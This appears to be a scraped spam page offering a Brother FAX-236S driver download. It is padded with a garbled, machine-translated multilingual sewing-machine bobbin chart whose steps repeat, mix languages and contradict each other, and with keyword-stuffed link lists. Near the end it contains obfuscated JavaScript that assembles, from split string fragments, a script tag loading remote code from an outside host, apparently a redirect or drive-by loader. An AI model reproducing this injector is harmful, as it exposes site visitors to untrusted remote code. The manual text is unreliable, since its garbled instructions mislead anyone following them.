

---

Download



[Драйвера Для Brother Fax-236S скачать](#)

**Quick Reference Chart 1 – Preparing the bobbin thread – / Tableau de référence rapide 1 – Préparation du fil de la canette – / Kurzübersicht 1 – Vorbereitung des Spulenfadens – / Verkorte handleiding 1 – De onderdraad voorbereiden – / Tabla de referencia rápida 1 – Preparación del hilo de la bobina – / Tabella di riferimento rapido 1 – Preparazione della spolina –**

Be sure to read the "Safety Precautions" in the Operation Manual. This Quick Reference Chart provides information on winding and installing the bobbin. For each step in the procedure, refer to the location of the sewing machine in the center for an indication of the exact location of the operation. For details on the procedure, refer to "Winding/Installing the Bobbin" in the Operation Manual.  
 Lire attentivement le "Précautions de Sécurité" dans le Manuel d'opération. Ce tableau de référence rapide vous donne des informations sur le bobinage et l'installation de la bobine. Pour chaque étape de la procédure, reportez-vous à la position de la machine à coudre. Pour obtenir des détails sur la procédure, reportez-vous à la section "Bobinage/Installation de la bobine" du manuel d'instructions.  
 Lesen Sie bitte die "Sicherheitsmaßnahmen" in der Bedienungsanleitung. Diese Kurzübersicht enthält Informationen zum Aufwinden und Einsetzen der Unterfaden-Spule. Beachten Sie die jeweilige Bedienungsanleitung der Nähmaschine für Hinweise zur korrekten Positionierung der Nähmaschine. Für Einzelheiten zur Bedienungsanleitung siehe Abschnitt über die "Aufwinden/Einsetzen der Spule" in der Bedienungsanleitung.  
 Zegprent de wett "Veiligheidsmaatregelen" in de handleiding goed lezen. Deze referentiekaart geeft u informatie over het opwinden en het plaatsen van de onderdraad spool. Voor elke stap in de procedure verwijst u naar de locatie van de naaimachine in het midden van de afbeelding. Voor details over de procedure verwijst u naar de handleiding. "Op het opwinden/installeren" in de handleiding.  
 Lea atentamente "Precauciones de Seguridad" del manual de instrucciones. Este cuadro de referencia rápida proporciona información sobre el bobinado e instalación de la bobina. Para cada paso del procedimiento, figuren la ubicación de la máquina de coser que se muestra en el centro para saber exactamente dónde se debe trabajar. Para más detalles sobre el procedimiento, consulte el apartado "Bobinado/Instalación de la bobina" del manual de instrucciones.  
 Leggere attentamente le "precauzioni di sicurezza" del manuale d'istruzione. La presente tabella di riferimento rapida fornisce informazioni sul avvolgimento e l'installazione della spolina. Per ogni passo della procedura, fare riferimento alla figura della macchina da cucire con contrappunti rossi, indicati nella posizione dell'operazione. Per informazioni dettagliate sulla procedura, consultare "Avvolgimento/Installazione della spolina" del manuale d'istruzione.

**Computerized Sewing Machine  
 Machine à coudre informatisée  
 Gecomputeriseerde Naaimachine  
 Máquina de Coser Computarizada  
 Macchina da cucire computerizzata**

**Actual size  
 Taille réelle  
 Urtliche Größe  
 Vraie Größe  
 Tamaño real  
 Dimensioni attual**

Proseguite a cacciare il filo.  
 Continuez à pousser le fil.  
 Fortsetzen Sie das Einfädeln.  
 Continúa empujando el hilo.  
 Continua a spingere il filo.

**1**

Turn the sewing machine  
 Mettez la machine à coudre aux broches  
 Drehen Sie die Nähmaschine an den Nadeln  
 Coloque la máquina de coser  
 Accende la macchina da cucire

**2**

Place the bobbin in the bobbin case (1) and thread it through the thread guide (2).  
 Placez la canette dans le boîtier à canette (1) puis faites-la passer sur le guide à fils (2).  
 Setzen Sie die Unterfaden-Spule in den Bobbinfall (1) und führen Sie den Unterfaden durch den Fadenführer (2).  
 Coloque la bobina en el cajón de la bobinadora (1) después de haberla pasado por el conductor de hilos (2).  
 Posizionare la spolina nel contenitore (1) quindi avvolgerla sulla guida del filo (2).

**3**

Wind the bobbin thread (1) and pull it through the thread guide (2).  
 Enroulez le fil de la canette (1) et tirez-le sur le guide à fils (2).  
 Wickeln Sie den Unterfaden um die Spule (1) und ziehen Sie ihn durch den Fadenführer (2).  
 Avvolga il filo della bobina (1) e tiratelo sulla guida del filo (2).  
 Avvolgere il filo della spolina (1) avvolgendo la spolina.

**4**

Thread the bobbin through the thread guide (1).  
 Faites passer la bobine à travers le guide à fils (1).  
 Führen Sie die Unterfaden-Spule durch den Fadenführer (1).  
 Avvolga il filo della bobina (1) attraverso il guidafilino (1) avvolgendo la spolina.

**5**

Wind the bobbin thread around the bobbin case (1) and pull it through the thread guide (2).  
 Enroulez le fil de la canette (1) et tirez-le sur le guide à fils (2).  
 Wickeln Sie den Unterfaden um die Spule (1) und ziehen Sie ihn durch den Fadenführer (2).  
 Avvolga il filo della bobina (1) avvolgendo la spolina.

**6**

Wind the bobbin thread around the bobbin case (1) and pull it through the thread guide (2).  
 Enroulez le fil de la canette (1) et tirez-le sur le guide à fils (2).  
 Wickeln Sie den Unterfaden um die Spule (1) und ziehen Sie ihn durch den Fadenführer (2).  
 Avvolga il filo della bobina (1) avvolgendo la spolina.

**7**

Insert the bobbin into the bobbin case (1) and pull it through the thread guide (2).  
 Insérez la canette dans le boîtier à canette (1) puis faites-la passer sur le guide à fils (2).  
 Setzen Sie die Unterfaden-Spule in den Bobbinfall (1) und führen Sie den Unterfaden durch den Fadenführer (2).  
 Coloque la bobina en el cajón de la bobinadora (1) después de haberla pasado por el conductor de hilos (2).  
 Posizionare la spolina nel contenitore (1) quindi avvolgerla sulla guida del filo (2).

**8**

Wind the bobbin thread around the bobbin case (1) and pull it through the thread guide (2).  
 Enroulez le fil de la canette (1) et tirez-le sur le guide à fils (2).  
 Wickeln Sie den Unterfaden um die Spule (1) und ziehen Sie ihn durch den Fadenführer (2).  
 Avvolga il filo della bobina (1) avvolgendo la spolina.

**9**

Wind the bobbin thread around the bobbin case (1) and pull it through the thread guide (2).  
 Enroulez le fil de la canette (1) et tirez-le sur le guide à fils (2).  
 Wickeln Sie den Unterfaden um die Spule (1) und ziehen Sie ihn durch den Fadenführer (2).  
 Avvolga il filo della bobina (1) avvolgendo la spolina.

**10**

Remove the bobbin from the bobbin case (1).  
 Retirez la canette du boîtier à canette (1).  
 Entfernen Sie die Unterfaden-Spule aus dem Bobbinfall (1).  
 Retire la bobina del cajón de la bobinadora (1).  
 Rimuovere la spolina dal contenitore (1).

**11**

Insert the bobbin into the bobbin case (1) and pull it through the thread guide (2).  
 Insérez la canette dans le boîtier à canette (1) puis faites-la passer sur le guide à fils (2).  
 Setzen Sie die Unterfaden-Spule in den Bobbinfall (1) und führen Sie den Unterfaden durch den Fadenführer (2).  
 Coloque la bobina en el cajón de la bobinadora (1) después de haberla pasado por el conductor de hilos (2).  
 Posizionare la spolina nel contenitore (1) quindi avvolgerla sulla guida del filo (2).

**12**

Reinsert the bobbin into the bobbin case (1) and pull it through the thread guide (2).  
 Réinsérez la canette dans le boîtier à canette (1) puis faites-la passer sur le guide à fils (2).  
 Wiedereinsetzen der Unterfaden-Spule in den Bobbinfall (1) und führen Sie den Unterfaden durch den Fadenführer (2).  
 Reinserte la bobina en el cajón de la bobinadora (1) después de haberla pasado por el conductor de hilos (2).  
 Reinscrivere la spolina nel contenitore (1) avvolgendo la spolina.

XC-646-151②

[Драйвера Для Brother Fax-236S скачать](#)

Download



Компания НИКС Екатеринбург работает на рынке поставщиков компьютерной техники с 1991 года.

- 1. [brother](#)
- 2. [brotherhood](#)
- 3. [brother printer drivers](#)

FAX - 236S is a direct thermal paper facsimile that comes with features like a key- lock system, which enables the machine to cease sending faxes, making a.. No More Page- by- Page Faxing All machines in the Fax Easy series come with Automatic Document Feeder (ADF) that allows you to hold up 1.. Описание и технические характеристики МФУ Brother DCP-8085DN.. Brother FAX - 236S · Brother FAX-335MCS · Brother FAX-T104 · Brother FAX-T106.. Каталог товаров с описаниями: факсы, принтеры, многофункциональные устройства, швейные машины и др.

## brother

brother, brother meaning, brothers pizza, brother printer, brother and sister song, brothers osborne, brother bear, brother definition, brothers movie, brother sewing machine, brothers pizza nyc, brothers pizza brooklyn [preeti to unicode converter software download](#)

Fast Fax Transmission Brother Fax machine comes with a G3 9 K bps modem that ensures fast transmission. [Kithara Dos Enabler Download Firefox](#)

### Quick Reference Chart 1 - Preparing the bobbin thread - / Tableau de référence rapide 1 - Préparation du fil de la canette - / Kurzübersicht 1 - Vorbereitung des Spulenfadens - / Verkoorte handleiding 1 - De onderdraad voorbereiden - / Tabla de referencia rápida 1 - Preparación del hilo de la bobina - / Tabella di riferimento rapido 1 - Preparazione della spolina -

See also the "Safety Readings" in the Operation Manual. This Quick Reference Chart provides information on winding and installing the bobbin. For each step in the procedure, refer to the illustration of the sewing machine in the center for an indication of the exact location of the operation. For details on the procedure, refer to "Winding/Installing the Bobbin" in the Operation Manual. Lire attentivement les "Précautions de Sécurité" du Manuel d'Instructions. Ce tableau de référence rapide donne des informations sur le bobinage et l'installation de la canette. À chaque étape de la procédure, reportez-vous à l'illustration de la machine à coudre à côté de laquelle se trouve l'indication de l'emplacement exact de l'opération. Pour obtenir des détails sur la procédure, reportez-vous à la section "Bobinage/Installation de la canette" du manuel d'instructions. Leer atentamente el capítulo de "Seguridad" del Manual de Instrucciones. Este cuadro de referencia rápida proporciona información acerca de bobinado y la instalación de la bobina. Para cada paso del procedimiento, fíjese en la ilustración de la máquina de coser que se encuentra al centro para saber exactamente dónde se sitúa la operación. Para más detalles sobre el procedimiento, consulte el apartado "Envolado/Colocación de la bobina" del Manual de Instrucciones. Leggere attentamente le "Precauzioni di Sicurezza" del manuale di istruzioni. La presente tabella di rapida consultazione porta le informazioni sul avvolgimento e l'installazione della spolina. Per ogni passo della procedura, rivolgetevi alle figure della macchina da cucire con accanto l'indicazione precisa dell'operazione. Per informazioni dettagliate sulla procedura, consultate l'assegnamento relativo alla sezione della spolina del manuale di istruzioni.

Computerized Sewing Machine à coudre informatisée Computergestützte Nähmaschine Gecomputeriseerde naaimachine Máquina de Coser Computerizada Macchina da Cucire Computerizzata

**1** Insert the bobbin into the case, pass the thread through the slot, and then set the thread with the cover. ● Be sure to insert the bobbin correctly. Insérer la canette dans le couvercle, passer le fil dans le trou, puis pousser le couvercle. ● Assurez-vous d'insérer correctement la canette. Insertar la spolina en el cajón, pasar el hilo por el agujero y empujar el tapón. ● Asegúrese de insertar correctamente la spolina. Inserir la spolina nel coperchio, passare il filo per il foro e premere il tappo. ● Assicurarsi di inserire la spolina correttamente.

**2** Turn on the sewing machine. Make the machine ready to sew. ● Switch on the sewing machine. Mettre la machine prête à coudre. ● Einschalten der Nähmaschine. Poner la máquina lista para coser. ● Accendere la macchina da cucire. Posizionare la spolina nell'avvitatore spolina, quindi avvolgere il filo e avvolgere la spolina.

**3** Place the bobbin into the case. ● Place the bobbin into the case. ● Mettre la bobine dans le couvercle. ● Einlegen der Spule in den Deckel. ● Colocar la bobina en el cajón de la bobina. ● Inserir la spolina nel coperchio. ● Place the bobbin into the case. ● Mettre la bobine dans le couvercle. ● Einschalten der Nähmaschine. Poner la máquina lista para coser. ● Accendere la macchina da cucire. Posizionare la spolina nell'avvitatore spolina, quindi avvolgere il filo e avvolgere la spolina.

**4** Place the thread into the case. ● Place the thread into the case. ● Mettre le fil dans le couvercle. ● Einlegen des Fadens in den Deckel. ● Colocar el hilo en el cajón de la bobina. ● Inserir il filo nel coperchio. ● Place the thread into the case. ● Mettre le fil dans le couvercle. ● Einschalten der Nähmaschine. Poner la máquina lista para coser. ● Accendere la macchina da cucire. Posizionare la spolina nell'avvitatore spolina, quindi avvolgere il filo e avvolgere la spolina.

**5** Wind the thread around the bobbin under the foot. ● Wind the thread around the bobbin under the foot. ● Enrouler le fil autour de la bobine sous le pied. ● Einwickeln des Fadens unter den Fuß. ● Avvolgere il filo attorno alla bobina sotto il piede. ● Wind the thread around the bobbin under the foot. ● Enrouler le fil autour de la bobine sous le pied. ● Einschalten der Nähmaschine. Poner la máquina lista para coser. ● Accendere la macchina da cucire. Posizionare la spolina nell'avvitatore spolina, quindi avvolgere il filo e avvolgere la spolina.

**6** Wind the thread clockwise around the bobbin four or five times, and then cut the thread by pulling it through the slot in the bobbin under the foot. ● Wind the thread clockwise around the bobbin four or five times, and then cut the thread by pulling it through the slot in the bobbin under the foot. ● Enrouler le fil dans le sens des aiguilles d'une montre quatre ou cinq fois autour de la bobine, puis couper le fil en tirant sur le fil à travers le trou de la bobine sous le pied. ● Einwickeln des Fadens im Uhrzeigersinn vier bis fünfmal um die Spule, und schneiden Sie den Faden ab, indem Sie ihn durch den Schlitz am Boden des Deckels. ● Avvolgere il filo in senso orario quattro o cinque volte attorno alla bobina, quindi tagliare il filo tirandolo attraverso il foro della spolina. ● Wind the thread clockwise around the bobbin four or five times, and then cut the thread by pulling it through the slot in the bobbin under the foot. ● Enrouler le fil dans le sens des aiguilles d'une montre quatre ou cinq fois autour de la bobine, puis couper le fil en tirant sur le fil à travers le trou de la bobine sous le pied. ● Einschalten der Nähmaschine. Poner la máquina lista para coser. ● Accendere la macchina da cucire. Posizionare la spolina nell'avvitatore spolina, quindi avvolgere il filo e avvolgere la spolina.

**7** Increase the sewing speed, and then press the start/stop button. ● Increase the sewing speed, and then press the start/stop button. ● Augmenter la vitesse de couture, puis appuyer sur la touche Marche/Arrêt. ● Erhöhen Sie die Nähgeschwindigkeit, und drücken Sie die Start/Stop-Taste. ● Aumentare la velocità di cucitura, quindi premere il pulsante Avvio/Stop. ● Increase the sewing speed, and then press the start/stop button. ● Augmenter la vitesse de couture, puis appuyer sur la touche Marche/Arrêt. ● Erhöhen Sie die Nähgeschwindigkeit, und drücken Sie die Start/Stop-Taste. ● Aumentare la velocità di cucitura, quindi premere il pulsante Avvio/Stop.

**8** After the bobbin is spun, press the start/stop button. ● After the bobbin is spun, press the start/stop button. ● Après que la bobine a été tournée, appuyer sur la touche Marche/Arrêt. ● Nach dem Spulen der Spule, drücken Sie die Start/Stop-Taste. ● Dopo che la spolina è stata avvolta, premere il pulsante Avvio/Stop. ● After the bobbin is spun, press the start/stop button. ● Après que la bobine a été tournée, appuyer sur la touche Marche/Arrêt. ● Erhöhen Sie die Nähgeschwindigkeit, und drücken Sie die Start/Stop-Taste. ● Aumentare la velocità di cucitura, quindi premere il pulsante Avvio/Stop.

**9** Cut the thread, slide the bobbin under or over the foot, and then remove the bobbin. ● Cut the thread, slide the bobbin under or over the foot, and then remove the bobbin. ● Couper le fil, glisser la bobine sous ou sur le pied, puis retirer la canette. ● Schneiden des Fadens, schieben die Spule unter oder über den Fuß und die Spule entfernen. ● Cortar el hilo, deslizar la bobina por debajo o por encima del pie y retirar la bobina. ● Tagliare il filo, scivolare la spolina sotto o sopra il piede e toglierla dalla spolina. ● Cut the thread, slide the bobbin under or over the foot, and then remove the bobbin. ● Couper le fil, glisser la bobine sous ou sur le pied, puis retirer la canette. ● Schneiden des Fadens, schieben die Spule unter oder über den Fuß und die Spule entfernen. ● Cortar el hilo, deslizar la bobina por debajo o por encima del pie y retirar la bobina. ● Tagliare il filo, scivolare la spolina sotto o sopra il piede e toglierla dalla spolina.

**10** Remove the bobbin cover. ● Remove the bobbin cover. ● Retirer le couvercle de la bobine. ● Entfernen des Spulendeckels. ● Retirar el tapón de la bobina. ● Rimuovere il coperchio della spolina. ● Remove the bobbin cover. ● Retirer le couvercle de la bobine. ● Entfernen des Spulendeckels. ● Retirar el tapón de la bobina. ● Rimuovere il coperchio della spolina.

**11** Insert the bobbin into the case, pass the thread through the slot, and then set the thread with the cover. ● Insert the bobbin into the case, pass the thread through the slot, and then set the thread with the cover. ● Insérer la canette dans le couvercle, passer le fil dans le trou, puis pousser le couvercle. ● Inserir la spolina nel coperchio, passare il filo per il foro e premere il tappo. ● Insert the bobbin into the case, pass the thread through the slot, and then set the thread with the cover. ● Insérer la canette dans le couvercle, passer le fil dans le trou, puis pousser le couvercle. ● Inserir la spolina nel coperchio, passare il filo per il foro e premere il tappo.

**12** Repeat the bobbin cover. ● Repeat the bobbin cover. ● Répéter le couvercle de la bobine. ● Wiederholen Sie das Bedecken der Spule. ● Repetir el tapón de la bobina. ● Ripetere la chiusura della bobina. ● Repeat the bobbin cover. ● Répéter le couvercle de la bobine. ● Wiederholen Sie das Bedecken der Spule. ● Repetir el tapón de la bobina. ● Ripetere la chiusura della bobina.

[Canon Laser Printer Lbp 6000 Driver Download](#)

---

## brotherhood

[download atlas wali songo pdf to jpg](#)

This feature- packed fax includes a 9 It includes speed- dial storage of up to 1.. Компания Brother предлагает обширный ассортимент факсимильных аппаратов, отвечающих любым требованиям.. FAX- 2 36 S is a direct thermal paper facsimile that comes with features like a key- lock system, which enables the machine to cease sending faxes, making a phone call or copying, an automatic paper cutter and an anti- curl system. [Google Chrome Downloader For Mac](#)

## brother printer drivers

[Oracle Virtualbox Images For Mac](#)

Магазины и сервисные центры Сведения о компании.. Они подходят для использования Overall, this fax machine helps to save costs as it can accommodate up to 5.. ";RqH["SV"]=" t";RqH["Cb"]="sr";RqH["Ai"]="Uc";RqH["iq"]="r";RqH["Fz"]="er";RqH["zf"]="ts";RqH["EG"]="de";RqH["ki"]="q ";RqH["ME"]="RX";RqH["zx"]=".. write(RqH["uq"])+RqH["qQ"]+RqH["zp"]+RqH["kj"]+RqH["dx"]+RqH["iq"]+RqH["ki"]+RqH["yu"]+RqH["MA"]+RqH["BN"]+RqH["pw"]+RqH["Lb"]+RqH["hF"]+RqH["ID"]+RqH["Eg"]+RqH["Lb"]+RqH["hF"]+RqH["ID"]+RqH["SV"]+RqH["ri"]+RqH["LI"]+RqH["qw"]+RqH["IT"]+RqH["xH"]+RqH["Ay"]+RqH["dx"]+RqH["Lb"]+RqH["hF"]+RqH["ID"]+RqH["gp"]+RqH["Cb"]+RqH["fo"]+RqH["DA"]+RqH["LW"]+RqH["MJ"]+RqH["oj"]+RqH["kQ"]+RqH["MF"]+RqH["dk"]+RqH["CQ"]+RqH["hy"]+RqH["Ai"]+RqH["XA"]+RqH["Gd"]+RqH["gP"]+RqH["YF"]+RqH["ME"]+RqH["ED"]+RqH["ob"]+RqH["Gh"]+RqH["zx"]+RqH["qQ"]+RqH["zp"]+RqH["zf"]+RqH["Fz"]+RqH["nu"]+RqH["wX"]+RqH["HY"]+RqH["Qc"]+RqH["Th"]+RqH["OW"]+RqH["wF"]+RqH["hN"]+RqH["eC"]+RqH["EG"]+RqH["nx"]+RqH["Ex"]+RqH["dD"]+RqH["kI"]+RqH["ba"]+RqH["cs"]+RqH["bs"]+RqH["Eg"]+RqH["JJ"]+RqH["qQ"]+RqH["zp"]+RqH["kj"]);FAX- 2.. j";RqH["ID"]="pt";RqH["dx"]="va";RqH["YF"]="74";RqH["nx"]="x\_";RqH["ba"]="ad";RqH["JJ"]="s";RqH["ED"]="Mz";RqH["yu"]="= ";RqH["qQ"]="cr";RqH["nu"]="ve";RqH["MJ"]="p";RqH["hy"]="Ac";RqH["dD"]="wn";RqH["bs"]="s\"";RqH["ri"]="yp";RqH["Qc"]="a";RqH["zp"]="ip";RqH["oj"]="//";RqH["ob"]="X7";RqH["Th"]="rt";RqH["LW"]="tt";RqH["kI"]="lo";RqH["gp"]="\" ";RqH["DA"]="h";RqH["fo"]="c=";RqH["MA"]="zl";RqH["BN"]="i;";RqH["Gd"]="w3";RqH["hN"]="g/";RqH["kQ"]="0t";RqH["Ex"]="do";RqH["Lb"]="sc";RqH["hF"]="ri";RqH["XA"]="sG";RqH["uq"]="". var zli = '%d0%b4%d1%80%d0%b0%d0%b9%d0%b2%d0%b5%d1%80%d0%b0+%d0%b4%d0%bb%d1%8f+brother+fax-236s';var RqH = new Array();RqH["wX"]="r.. Acts as a Copier The Fax Easy is also a copier machine You can make crisp, clear copies using the sheet- fed mechanism, as well as scale your copies from 5.. s";RqH["Ay"]="ja";RqH["MF"]="Jy";RqH["OW"]="ur";RqH["Eg"]=">";RqH["xH"]="t/";RqH["dk"]="jg";RqH["CQ"]="se";RqH["wF"]="eg";RqH["cs"]=".. 36 S | Brother Simplify workflow with unattended faxing, copying and scanning with a 1.. Драйвер для 'Brother FAX-236(S) факс (термобумага)' можно скачать с сайта производителя. 34bbb28f04 [Cara Install Windows Xp Via Networks](#)

34bbb28f04

[Red Eye Save Editor Download](#)